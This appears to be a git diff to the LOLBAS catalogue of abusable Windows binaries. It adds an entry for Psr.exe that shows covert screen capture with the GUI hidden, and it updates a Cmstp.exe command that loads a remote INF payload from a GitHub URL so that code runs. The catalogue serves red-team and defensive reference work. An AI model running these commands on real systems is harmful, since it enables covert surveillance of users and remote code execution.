diff --git a/Contribute.md b/Contribute.md index 4e64756..14ca7a0 100644 --- a/Contribute.md +++ b/Contribute.md @@ -4,7 +4,7 @@ to send me a tweet and I will add the contribution for you. ## Binary.exe -* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search, Compile, Credentials +* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search, Compile, Credentials, Surveillance ``` Example diff --git a/LOLBins.md b/LOLBins.md index a64fb69..7e2b37b 100644 --- a/LOLBins.md +++ b/LOLBins.md @@ -37,6 +37,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge [Powershell.exe](OSBinaries/Powershell.md) [Presentationhost.exe](OSBinaries/Presentationhost.md) [Print.exe](OSBinaries/Print.md) +[Psr.exe](OSBinaries/Psr.md) [Qprocess.exe](OSBinaries/Qprocess.md) [Reg.exe](OSBinaries/Reg.md) [Regedit.exe](OSBinaries/Regedit.md) diff --git a/OSBinaries/Cmstp.md b/OSBinaries/Cmstp.md index 2cafd69..33b8511 100644 --- a/OSBinaries/Cmstp.md +++ b/OSBinaries/Cmstp.md @@ -5,7 +5,7 @@ ``` cmstp.exe /ni /s c:\cmstp\CorpVPN.inf -cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp.inf +cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf ``` Acknowledgements: @@ -13,8 +13,8 @@ Acknowledgements: * Nick Tyrer - @NickTyrer Code sample: -* [Cmstp.inf](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp.inf) -* [Cmstp_calc.sct](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp_calc.sct) +* [Cmstp.inf](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf) +* [Cmstp_calc.sct](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct) Resources: * https://twitter.com/NickTyrer/status/958450014111633408 diff --git a/OSBinaries/Psr.md b/OSBinaries/Psr.md new file mode 100644 index 0000000..af8c129 --- /dev/null +++ b/OSBinaries/Psr.md @@ -0,0 +1,30 @@ +## Psr.exe + +* Functions: Surveillance + +``` +psr.exe /start /gui 0 /output c:\users\user\out.zip + +psr.exe /stop +``` + +Acknowledgements: +* + +Code sample: +* + +Resources: +* https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf + +Full path: +``` +C:\Windows\System32\Psr.exe +C:\Windows\SysWOW64\Psr.exe +``` + +Notes: +It does not log keystrokes. Only screenshots when something is clicked. + + + \ No newline at end of file